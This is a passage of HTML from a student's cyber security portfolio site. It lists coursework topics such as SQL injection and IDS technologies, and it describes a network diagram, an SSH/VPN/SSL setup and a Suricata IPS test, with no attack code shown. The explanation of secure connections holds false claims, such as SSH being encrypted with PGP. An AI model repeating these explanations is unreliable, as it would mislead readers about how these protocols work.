          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
